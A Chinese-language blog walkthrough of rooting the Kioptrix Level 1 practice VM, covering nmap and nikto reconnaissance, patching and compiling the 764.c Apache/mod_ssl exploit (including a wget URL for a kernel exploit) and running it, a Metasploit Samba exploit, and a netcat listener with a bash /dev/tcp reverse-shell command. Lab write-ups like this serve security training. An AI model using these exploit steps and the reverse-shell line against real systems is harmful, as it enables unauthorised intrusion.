美文网首页
Kioptrix Level 1靶机渗透

Kioptrix Level 1靶机渗透

作者: Conn606 | 来源:发表于2021-03-14 10:46 被阅读0次

一、kali nmap 发现主机

1.用namp扫描c段 没发现主机

解决办法 :

(1):打开靶机所在文件夹,找到vmx后缀的文件并打开

(2):将Bridged全部改成nat(默认是桥接模式,因为kali是nat才能扫描IP)

2.识别到主机IP为192.168.65.134
3.端口扫描,发现开放了80、22、111、139、443、1024端口
4.nikto目录扫描

二、漏洞利用之apache

1.搜索apache 1.3.20版本漏洞
2.编译执行漏洞
  • 发现编译764.c失败,解决办法如下:
  1. 安装libssl,命令sudo apt-get install libssl1.0-dev
  1. 在头文件添加#include <openssl/rc4.h> #include <openssl/md5.h>
  1. 将#define COMMAND2,wget后面的URL修改为https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
  1. 将unsigned char *p, *end前添加const

5.在kali编译成功gcc -o okk 764.c -lcrypto

  1. 执行漏洞成功./okk 0x6b 192.168.65.134 -c 40

三、漏洞利用之Samba

Samba是在LinuxUNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成

1.信息收集发现主机139端口安装了samba,版本为Samba 2.2.1a
2.直接msf搜索samba
3.漏洞利用提权
4.nc反弹shell

1.kali nc监听端口nc -lvvp 1234

2.反弹shellbash -i >& /dev/tcp/192.168.65.129/1234 0>&1(192.168.65.129是kali主机的ip,不是靶机的ip)


3.反弹成功

相关文章

  • Kioptrix Level 1靶机渗透

    一、kali nmap 发现主机 1.用namp扫描c段 没发现主机 解决办法 : (1):打开靶机所在文件夹,找...

  • Kioptrix_Level_2靶机

    仅供交流与学习使用,请勿用于非法用途 环境搭建 不废话,下载完成,虚拟机打开就行 确定靶机 扫描端口 确定资产 8...

  • 渗透测试-KioptrixVM3靶机渗透

    1.环境部署靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.r...

  • Gear_Of_War#1靶机渗透实战

    Gear_Of_War#1靶机渗透实战 1、信息收集 先探测smb服务 发现靶机开启了该共享 //192.168....

  • BTRsys1渗透实战

    BTRsys1渗透,该靶机没有什么难度,无聊拿来练一练吧!!!期待BTRsys-2靶机。。。靶机IP:192.16...

  • 渗透靶机

    1.metasploitable-linux-2.0 https://excellmedia.dl.sourcef...

  • HTB靶机渗透

    信息收集 这里可以先设置一下hosts文件 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 那...

  • FourAndSix靶机渗透

    有点小白, 专业是网络安全, 但是目前刚刚接触, 心里诚惶诚恐, 想学, 但是害怕失败, 聊寄于写博客来不断地提升...

  • sunset靶机渗透实战

    sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习本垃圾现在转向工控安全领域继续学习,后续将推出团...

  • jarbas渗透实战

    jarbas靶机渗透,利用jenkins_script来getshell,利用crontab定时执行练习提权靶机I...

网友评论

      本文标题:Kioptrix Level 1靶机渗透

      本文链接:https://www.haomeiwen.com/subject/fclqcltx.html